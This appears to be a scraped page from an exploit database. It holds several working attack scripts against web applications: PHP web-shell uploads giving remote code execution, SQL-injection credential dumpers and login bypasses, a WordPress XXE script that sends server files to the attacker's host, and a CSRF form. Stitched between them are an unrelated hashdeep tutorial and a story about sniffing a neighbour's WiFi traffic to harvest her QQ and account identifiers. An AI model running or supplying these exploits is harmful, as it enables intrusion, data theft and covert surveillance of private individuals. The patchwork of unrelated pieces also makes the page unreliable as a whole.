'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'iframe',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
}
files = {
"userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"),
}
s = requests.session()
# Login as admin
s.get(url_main, headers = headers_login)
# Upload file
upload = s.post(url_upload, files=files, headers = headers_upload)
# Execute command
cmd = s.post(url_cmd)
print(cmd.text.replace("<pre>","").replace("</pre>",""))
if __name__ == "__main__":
main()
# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities.
Easy authentication bypass vulnerability on the application
allowing the attacker to login
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/attendance/login.php
Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+
----- PoC-2: Authentication Bypass -----
Steps:
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
{"status":"failed","msg":"Invalid username or password."}
with
{"status":"success","msg":"Login successfully."}
# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec)
# Date: 16/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip
# Vendor: breakthrough2
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
import requests,argparse
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G')
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
# POST /LibraryManagement/fine-student.php
# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha
def sqliPayload(char,position,userid,column,table):
sqli = 'inject\' UNION SELECT IF(SUBSTRING('
sqli += str(column)+','
sqli += str(position)+',1) = \''
sqli += str(char)+'\',sleep(1),null) FROM '
sqli += str(table)+' WHERE adminId='
sqli += str(userid)+'; -- kamahamaha'
return sqli
chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
'8','9','@','#']
def postRequest(URL,sqliReq,char,position,pxy):
sqliURL = URL
params = {"check":1,"id":sqliReq}
if pxy:
req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10)
else:
req = requests.post(url=sqliURL, data=params, verify=False, timeout=10)
#print("{} : {}".format(char,req.elapsed.total_seconds()))
return req.elapsed.total_seconds()
def theHarvester(target,CHARS,url,pxy):
#print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id']))
position = 1
theHarvest = ""
while position < 8:
for char in CHARS:
sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table'])
if postRequest(url,sqliReq,char,position,pxy) > 1:
theHarvest += char
break;
position += 1
return theHarvest
class userObj:
def __init__(self,username,password):
self.username = username
self.password = password
class tableSize:
def __init__(self,sizeU,sizeP):
self.sizeU = sizeU
self.sizeP = sizeP
self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST
self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST
def printHeader(self):
width = self.sizeU+self.sizeP+3
print(BR+" "*width+ST)
print(self.uTitle,self.pTitle)
print(BR+" "*width+ST)
def printTableRow(user,size):
username = user.username
unLen = len(username)
if unLen < size.sizeU:
username = username+(" "*(size.sizeU - unLen))
else:
name = name[:size.sizeU]
username += BR+" "+ST
password = user.password
pLen = len(password)
if pLen < size.sizeP:
password = password+(" "*(size.sizeP - pLen))
else:
password = password[:size.sizeP]
password += BR+" "+ST
print(username,password)
def sig():
SIG = SB+FY+" .-----.._ ,--.\n"
SIG += FY+" | .. > ___ | | .--.\n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
return SIG
def argsetup():
about = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"')
parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5')
parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent')
args = parser.parse_args()
if args.proxy:
regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$'
if re.match(regex,args.proxy,re.IGNORECASE):
args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)}
else:
print('{}Error: Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex))
print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0]))
sys.exit(-1)
else:
proxy = False
return args
if __name__ == "__main__":
header = SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
print(header)
print(sig())
args = argsetup()
host = args.targetHost
pxy = args.proxy
admins = args.DumpXAdmins
PATH = host+"/LibraryManagement/fine-student.php"
size = tableSize(20,20)
size.printHeader()
dumpnumber = 1
while dumpnumber <= admins:
adminUsername = { "id":dumpnumber, "table":"admin", "column":"username"}
adminUsername = theHarvester(adminUsername,chars,PATH,pxy)
adminPassword = { "id":dumpnumber, "table":"admin", "column":"password"}
adminPass = theHarvester(adminPassword,chars,PATH,pxy)
adminUser = userObj(adminUsername,adminPass)
printTableRow(adminUser,size)
# print("Admin's Username is: {}".format(adminUsername))
# print("Admin's Password is: {}".format(adminPass))
dumpnumber += 1
# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
# Date: 16/09/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://wordpress.com
# Affected Version: WordPress 5.6-5.7 & PHP8
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2021-29447
#!/bin/bash
# Author: @David_Uton (m3n0sd0n4ld)
# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX
# Variables
rHost=$1
username=$2
password=$3
readFile=$4
lHost=$5
# Functions
# Logotype
logoType(){
echo "
=====================================
CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
====================================="
}
# Create wav malicious
wavCreate(){
echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
}
# Create xx3.dtd
dtdCreate(){
cat <<EOT > xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://$lHost:8000/?p=%file;'>" >
EOT
}
# wav upload
wavUpload(){
cat <<EOT > .upload.py
#/usr/bin/env python3
import requests, re, sys
postData = {
'log':"$username",
'pwd':"$password",
'wp-submit':'Log In',
'redirect_to':'http://$rHost/wp-admin/',
'testcookie':1
}
r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True
cookies = r.cookies
print("[+] Getting Wp Nonce ... ")
res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)
print("[+] Uploading the wav file ... ")
postData = {
'name': 'payload.wav',
'action': 'upload-attachment',
'_wpnonce': wp_nonce
}
wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
if r_upload.status_code == 200:
image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
print('[+] Wav uploaded successfully')
else :
print("[-] Failed to receive a response for uploaded! Try again . \n")
exit(0)
EOT
python3 .upload.py
}
# Server Sniffer
serverSniffer(){
statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
}
# Load file and decoder
loadFile(){
content="http.server.log"
wavUpload
while :
do
if [[ -s $content ]]; then
echo "[+] Obtaining file information..."
sleep 5s # Increase time if the server is slow
base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u)
# Check file exists
echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php
sizeCheck=$(wc -c decode.php | awk '{printf $1}')
if [[ $sizeCheck -gt "46" ]]; then
php decode.php
else
echo "[!] File does not exist or is not allowed to be read."
fi
break
fi
done
}
# Cleanup
cleanup(){
kill $(cat http.server.pid) &>/dev/null
rm http.server.log http.server.pid &>/dev/null
rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
}
# Execute
logoType
# Checking parameters
if [[ $# -ne 5 ]];then
echo "[!] Parameters are missing!!!"
echo ""
echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
else
# Test Connection...
echo "[*] Test connection to WordPress..."
# WP Auth
authCheck=$(curl -i -s -k -X $'POST' \
-H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'wordpress_test_cookie=WP%20Cookie%20check' \
--data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
"http://$rHost/wp-login.php" > .cookies.tmp)
auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }')
# Running authentication with WordPress.
if [[ $auth != "302" ]]; then
echo "[-] Authentication failed ! Check username and password"
else
echo "[+] Authentication successfull!!!"
# Create wav & dtd file
wavCreate
dtdCreate
serverSniffer
loadFile
cleanup
fi
fi
# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux (2021.4) / xammp
# Category: WebApp
# Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'"
# Date: 2021-08-15
######## Description ########
#
# Attacker can change admin informaiton
#
#
######## Proof of Concept ########
POST /srv/service/admin/updateuserinfo HTTP/1.1
Host: localhost
Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://localhost
Referer: http://localhost/Y/
Te: trailers
Connection: close
firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595
####### EXPLOIT ##################
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="victimsite.com/srv/service/admin/updateuserinfo" method="POST">
<input type="hidden" name="firstName" value="[CHANGEHERE]" />
<input type="hidden" name="lastName" value="[CHANGEHERE]" />
<input type="hidden" name="email" value="[CHANGEHERE]" />
<input type="hidden" name="phone" value="[CHANGEHERE]" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
# Exploit Author: Erwin Krazek (Nero)
# Date: 17/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Vendor: oretnom23
# Version: v1.0
# Tested on: Linux, Apache, Mysql
# Exploit Description:
Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.
# Vulnerable Code
In search.php on line 28
$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;
Sqlmap command:
sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch
Output:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
---
[17:33:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:33:38] [INFO] fetching database names
available databases [4]:
[*] church_db
[*] information_schema
[*] mysql
[*] performance_schema
There are a few remaining lamps, and the night is thick. I walked on an unknown small road in the city, complaining about the depression brought to me by work. Looking at the shy wallet and the confused way forward. I fell into deep thought. Today is another day of overtime. New projects are about to be launched, but bugs are emerging one after another, so I can only work overtime to this point. At this time, my wife probably all went to bed.
I came downstairs to the apartment I rented. The small apartment I rented was a two-story building with the landlord living downstairs, and there were two rooms upstairs. Previously, the room was accompanied by adults, and the child moved out after graduation. There is a small courtyard on the second floor, which is why I rented it. Sitting in the yard in summer, looking up at the starry sky, it’s so beautiful!
As soon as I went upstairs, I found that the light next door was on. This is all the point, where do you come from? It's probably a new one. I didn't care, I went to bed just after being tired for a day.
I wake up late every day, but I wake up particularly early today. Because I seemed to hear a woman talking in my dream. And it's a very magnetic sound. For a single dog like me, it is hard to come by! Because I am introverted and shy, I still have no girlfriend. And I seemed to see spring.
When I was at work, I met the landlord and mentioned this matter by the way. From the landlord, I learned that I had just moved here yesterday and seemed to be working in an administrative unit. It was a once-in-a-lifetime opportunity for me, and a new plan lingers in my mind all day.
Information Collection
Target: Collect QQ *bao Xinshou* number and other related information.
Blocking bricks and attracting jade
How to obtain the above information of the target? Some friends say it’s very simple? Just ask, but for people like us who are introverted. This is an insurmountable hurdle.
So how to do it? Although it is 5G now, the expensive costs make workers still like to take advantage of WIFI. She just moved here, and the first thing she did was to see if there was any useful WiFi.
So I turned on the router's guest network, without encryption. The purpose is to make it quickly take the bait. But some have some concerns due to free hotspots. It can also be set to encrypt WiFi and then share the password through the WiFi master key.
Working servo
After starting my plan, I get off work very early every day. The purpose is to get useful information early. Finally, God pays off and sees a strange device online.
You can see that an OPPO-Reno6-Pro-5G has been quietly launched.
Unexpected
Because it was night, the other party’s mobile phone must be using it. So our mobile phone data was used to capture packets.
tcpdump -i br0 host 192.168.123.90 -w 14235.cap 
After waiting for a while, we analyze the captured data packets
Download the data packet and open it with Wireshark 
Find QQ
Press ctrl+f to search hexadecimal 00 00 00 0d 
Confirm number 
Hand* 
A certain bao 
wei xin 
At this point, the basic information is collected. Next is a long road.
(There are many ten thousand words omitted here)
Declaration
The above content is only experimental data, please do not take it seriously. Please do not illegally and maliciously attack others, please do not use them illegally!
# Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# Exploit Details:
# 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session.
# 2. Set the 'action' parameter of the POST request to 'save_settings'.
# - `ajax.php?action=save_settings`
# 3. Capture request in burp and replace with with following request.
'''
POST /fos/admin/ajax.php?action=save_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251
Content-Length: 754
Origin: http://localhost
Connection: close
Referer: http://localhost/fos/admin/index.php?page=site_settings
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="name"
adsa
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="email"
asdsad@asda.com
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="contact"
asdsad
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="about"
asdsad
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php echo phpinfo();?>
-----------------------------120025571041714278883588636251--
'''
# ` Image uploader is renaming your payload using the following function.
# strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
# you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
# and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
# concate output with your playload name like this 1632085200_phpinfo.php
# 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Online Food Ordering System v2.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
______ _______ ________
___ //_/__ /_______ ___ _______ ______(_)_____ _
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
/___/
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'/assets/img/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'img':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'}
def id_generator():
x = datetime.datetime.now()
date_string = x.strftime("%y-%m-%d %H:%M")
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
timestamp = datetime.datetime.timestamp(date)
file = int(timestamp)
final_name = str(file)+'_shell.php'
return final_name
filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data)
shell_upload = True if("1" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)
# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Budget and Expense Tracker System 1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
______ _______ ________
___ //_/__ /_______ ___ _______ ______(_)_____ _
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
/___/
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'/uploads/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'img':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}
def id_generator():
x = datetime.datetime.now()
date_string = x.strftime("%y-%m-%d %H:%M")
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
timestamp = datetime.datetime.timestamp(date)
file = int(timestamp)
final_name = str(file)+'_shell.php'
return final_name
filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies)
shell_upload = True if("1" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)
We download files on the Internet, and sometimes we often see that the author of the file will attach the program's md5 value. The purpose is to allow users to compare the md5 value of the downloaded files. If the MD5 value of the file you download does not match the original author's provided, it means that the file has been modified by someone else. If it is a program, it is possible that someone else has joined a malicious backdoor.
The computer uses multiple hashes or message digests for any number of files. At the same time, you can choose to mine the directory structure recursively. By default, the program calculates MD5 and SHA-256 hashes, equivalent to -c md5, sha256. It can also use a known hash list to audit a set of files. Errors will be reported as standard errors. If no files are specified, read from standard input.
Using
hashdeep file name 
After modifying the file, look at the md5 value 
It can be found that the change from b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239 has become 02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69
Other parameters
-c: Mode. Use the specified algorithm to calculate the hash of the file. Support md5, sha1, sha256, tiger and whirlpool.
-r: Enable recursive mode. Iterate through all subdirectories. Note that recursive mode cannot be used to check all files with a given file extension. For example, calling hashdeep -r *.txt will check all files in a directory ending in .txt.
-v : Enable detailed mode. Use again to make the program more detailed.
# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 18-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://websitebaker.org/
# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
# Version: 2.13.0
# Category: Webapps
# Tested on: Linux/Windows
# WebsiteBaker Open Source Content Management
# Includes an endpoint that allows remote access
# Language page misconfigured, causing vulnerability
# User information with sufficient permissions is required.
# I had to write a long script to bypass some security measures.
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
